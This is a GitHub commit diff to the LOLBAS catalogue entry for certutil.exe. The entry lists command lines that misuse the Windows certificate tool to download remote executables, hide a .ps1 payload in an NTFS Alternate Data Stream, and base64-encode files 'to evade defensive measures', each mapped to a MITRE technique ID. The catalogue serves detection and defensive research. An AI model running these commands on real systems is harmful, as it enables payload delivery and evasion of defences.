Skip to content

Commit 90a991a

Browse files
github-actions[bot]github-actions[bot]
committed
1 parent 5067f15 commit 90a991a

File tree

1 file changed

+20
-6
lines changed

1 file changed

+20
-6
lines changed

_lolbas/Binaries/Certutil.md

Lines changed: 20 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -4,27 +4,36 @@ Description: Windows binary used for handling certificates
44
Author: Oddvar Moe
55
Created: 2018-05-25
66
Commands:
7-
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe}
8-
Description: Download and save executable to disk in the current folder.
7+
- Command: certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}
8+
Description: Download and save an executable to disk in the current folder.
99
Usecase: Download file from Internet
1010
Category: Download
1111
Privileges: User
1212
MitreID: T1105
1313
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
14-
- Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe}
15-
Description: Download and save executable to disk in the current folder.
14+
- Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
15+
Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not.
1616
Usecase: Download file from Internet
1717
Category: Download
1818
Privileges: User
1919
MitreID: T1105
2020
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
21-
- Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
22-
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
21+
- Command: certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
22+
Description: Download and save a .ps1 file to an Alternate Data Stream (ADS).
2323
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
2424
Category: ADS
2525
Privileges: User
2626
MitreID: T1564.004
2727
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
28+
- Command: certutil.exe -URL {REMOTEURL:.exe}
29+
Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash].
30+
Usecase: Download file from Internet
31+
Category: Download
32+
Privileges: User
33+
MitreID: T1105
34+
OperatingSystem: Windows 10, Windows 11
35+
Tags:
36+
- Application: GUI
2837
- Command: certutil -encode {PATH} {PATH:.base64}
2938
Description: Command to encode a file using Base64
3039
Usecase: Encode files to evade defensive measures
@@ -65,6 +74,7 @@ Resources:
6574
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
6675
- Link: https://twitter.com/mattifestation/status/620107926288515072
6776
- Link: https://twitter.com/egre55/status/1087685529016193025
77+
- Link: https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/
6878
Acknowledgement:
6979
- Person: Matt Graeber
7080
Handle: '@mattifestation'
@@ -73,4 +83,8 @@ Acknowledgement:
7383
- Person: egre55
7484
Handle: '@egre55'
7585
- Person: Lior Adar
86+
- Person: Adam
87+
Handle: '@hexacorn'
88+
- Person: SomeTestLeper
89+
Handle: '@SomeTestLeper'
7690
---

0 commit comments

Comments
 (0)